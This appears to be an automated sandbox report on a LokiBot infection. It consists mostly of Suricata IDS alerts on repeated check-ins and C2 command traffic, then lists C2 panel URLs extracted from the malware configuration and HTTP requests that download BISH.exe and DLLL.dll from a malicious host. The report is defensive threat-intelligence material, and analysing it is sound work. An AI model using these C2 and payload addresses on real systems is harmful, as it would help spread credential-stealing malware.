Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49956 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49803
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49847 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49847 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49992 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49992 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49871 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49871 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49914 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49914 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49914 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49847 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49992
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49943
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49895
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49745 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49956
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49871 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49983 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49785 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49914 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49785 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49785 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49871 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49871 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49961 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49785 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49785 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49988 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49818 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49818 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49854
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49939 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49939 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49947 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49947
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49977 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49977 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49977 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49983 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49983 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49977 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49977 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49961 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49983 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49983 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49988 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49815 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49745 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49785
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49988
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49871
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50025 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50025 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49730
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49914 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49914
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49818 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49822 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49822 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49822 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49822 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49815 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49822 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49961
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49818 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49818 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50004 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50004 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50004 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49847 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49815 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49952 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49952 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49952 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49939
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49977
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49800
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49900 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49900 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49900 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49900 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49900 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49995 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49995 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49995 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49983
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49900
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49995 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49933 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49933 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49745 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49847 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49847
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49745 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49745 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49815 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50004 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50004 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49995 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50025 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49745
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50034 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50034 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50001 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49952 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49952 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49952
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50004
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50034 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50001 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50001 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50025 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50025 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50034 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50031 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49818
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49933 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50001 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50031 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50031 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49933 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49933 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50034 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50001 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50031 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49933
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50031 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49995
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50001
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50034
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49815
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50031
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49909 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49909 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50012 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49909 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50012 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50012 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49909 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49909 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50006 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50012 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49909
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50012 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49971 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49971 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50025
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50012
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49965 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49965 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49965 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49965 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49965 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49965
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50006 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50006 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50006 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50006 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50006
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50021 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50021 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50021 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49822
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50021 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50021 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49971 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50021
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49971 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49971 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49887 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49887 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49887 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49887 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49887 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49887
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:49971
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50016 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50016 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50016 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50016 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50016 -> 104.21.57.140:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.57.140:80 -> 192.168.2.7:50016

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: https://dvlref.online/BISH/PWS/fre.php

Source: global traffic	HTTP traffic detected: GET /BISH.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DLLL.dll HTTP/1.1Host: dddotx.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 104.21.12.202:443

